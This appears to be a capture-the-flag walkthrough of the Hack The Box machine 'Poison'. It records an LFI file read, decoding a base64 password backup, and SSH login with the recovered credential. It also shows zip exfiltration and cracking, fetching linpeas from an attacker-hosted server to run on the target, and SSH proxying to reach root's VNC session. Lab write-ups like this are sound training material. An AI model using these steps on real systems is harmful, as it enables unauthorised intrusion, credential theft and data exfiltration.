Poison
Personal Rating: Easy
The initial access was incredibly easy, but the privilege escalation required some tools and concepts that I was not well versed in, which made it difficult for me to spot.
Initial Enumeration
sudo nmap -sV -sC <IP>
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Theres a webpage at http://10.10.10.84/

LFI Exploit
The scriptname field allow to read local files, which raises LFI suspicions :)
And indeed:

We got the user charix and its FreeBSD.
Password Extraction
If you open the php files shown in the info text one by one, the listfiles.php stands out:

Opening the pwdbackup.txt shows something interesting:

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
base64-decoding the string 13 times using cyberchef results in this:
Charix!2#4%6&8(0

ssh-ing to the box with charix:Charix!2#4%6&8(0
worked.
Internal Enumeration

I should exfiltrate the zip file.
Typing ‘python’ and pressing tab I found out that python2 was installed on the host, so I used a Python webserver to exfiltrate the file via wget:
python -m SimpleHTTPServer 8000
It is password protected:

Using zip2john I could extract the password:
[nix@local] $ zip2john /HTBfolder/Boxes/HTB-Poison/secret.zip
ver 2.0 secret.zip/secret PKZIP Encr: cmplen=20, decmplen=8, crc=77537827
secret.zip/secret:$pkzip2$1*1*2*0*14*8*77537827*0*24*0*14*7753*9827*8061b9caf8436874ad47a9481863b54443379d4c*$/pkzip2$:secret:secret.zip::/HTBfolder/Boxes/HTB-Poison/secret.zip
Putting the hash in a file and attempting to crack it with john did not work
john --wordlist=/usr/share/seclists/Passwords/rockyou.txt hash.tmp
Wow Okay, the password Charix!2#4%6&8(0
worked to open the zip.
The content of the secret file is odd:
[|Ֆz!
Internal Enumeration 2
I established a dynamic reverse proxy connection to the host with ssh:
ssh -D 9050 charix@10.10.10.84
This does not seem to work.

charix@Poison:~ % cat /etc/ssh/sshd_config | grep TcpForwarding
#AllowTcpForwarding yes
# AllowTcpForwarding no
TcpForwarding is not explicitly prohibited, but it might be a firewall issue
This does only show 22 and 9050, which is odd:
proxychains ss -tulpn
uname -a
reveals this: FreeBSD Poison 11.1-RELEASE
With a first internet search it does not seem like there is a big vulnerability for that os version.
ps -aux | grep root
shows this, which could be interesting:
root 529 0.0 0.7 23620 7468 v0- I 17:37 0:00.04 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/
root 540 0.0 0.5 67220 4676 v0- I 17:37 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop
root 703 0.0 0.2 10484 1608 v7 Is+ 17:39 0:00.00 /usr/libexec/getty Pc ttyv7
root 564 0.0 0.3 19660 2868 0 Is+ 17:37 0:00.01 -csh (csh)
I hosted linpeas on my machine and fetched and used it like this:
charix@Poison:~ % wget
http://10.10.16.6:8000/linpeas.sh
charix@Poison:~ % chmod +x linpeas.sh
./linpeas.sh
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
sed: first RE may not be empty
/tmp/.X11-unix/X1
└─(Read Write)
/var/run/devd.pipe
└─(Read Write)
/var/run/devd.seqpacket.pipe
└─(Read Write)
/var/run/log
└─(Read Write)
-r-sr-xr-x 1 root wheel 2.1M Jan 2 2018 /usr/local/bin/Xorg (Unknown SUID binary!)
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/lesspipe.sh
/usr/local/bin/gettext.sh
<SNIP>
I also ran LinEnum. But I did not see more than with linpeas.
Webserver deeper enum:
Since I could not find anything interesting locally, I went back to the webserver and checked the php info file. Maybe it runs as root or something along those lines.
http://10.10.10.84/browse.php?file=phpinfo.php
webroot: /usr/local/www/apache24/data
charix@Poison:/usr/local/www/apache24/data % ls
browse.php index.php info.php ini.php listfiles.php phpinfo.php pwdbackup.txt
I could not identify any obvious vulnerability in the php configuration.
One instance of httpd seems to run as root (ps -aux
)
root 632 0.0 1.1 99172 11516 - Ss 17:50 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT
I read that the initial access should have usually been a log poisoning. You should have gotten the www-data user with poisoning the apache log with a php executable user agent and then calling the log. From what I saw, this was not necessary. Since I made no progress here, I peaked in a walkthrough to get a hint. It was that the VNC session that I saw earlier could be connected to with a VNC viewer. So I was on the right track with the X Session I found and also the port forwarding I did was a good idea. I just have to connect to the session somehow.
Starting RealVNC Viewer with proxychains and calling 127.0.0.1 did not work.
I googled how to find listening ports on BSD:
sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 1144 3 tcp6 *:80 *:*
www httpd 1144 4 tcp4 *:80 *:*
root sendmail 650 3 tcp4 127.0.0.1:25 *:*
www httpd 648 3 tcp6 *:80 *:*
www httpd 648 4 tcp4 *:80 *:*
www httpd 647 3 tcp6 *:80 *:*
www httpd 647 4 tcp4 *:80 *:*
www httpd 646 3 tcp6 *:80 *:*
www httpd 646 4 tcp4 *:80 *:*
www httpd 645 3 tcp6 *:80 *:*
www httpd 645 4 tcp4 *:80 *:*
www httpd 644 3 tcp6 *:80 *:*
www httpd 644 4 tcp4 *:80 *:*
root httpd 632 3 tcp6 *:80 *:*
root httpd 632 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe
Okay, I will try connecting again, using the ports 5901 and 5801.
It works, but it asks for a password. The strings I collected so far did not work.

The string from the file looks very weird and didnt work. I downloaded tigervnc, which is a CLI vnc viewer. It can use a file as password input:
proxychains vncviewer passwd=/HTBfolder/Boxes/HTB-Poison/secret 127.0.0.1:5901
This worked to connect to the VNC session!

Last updated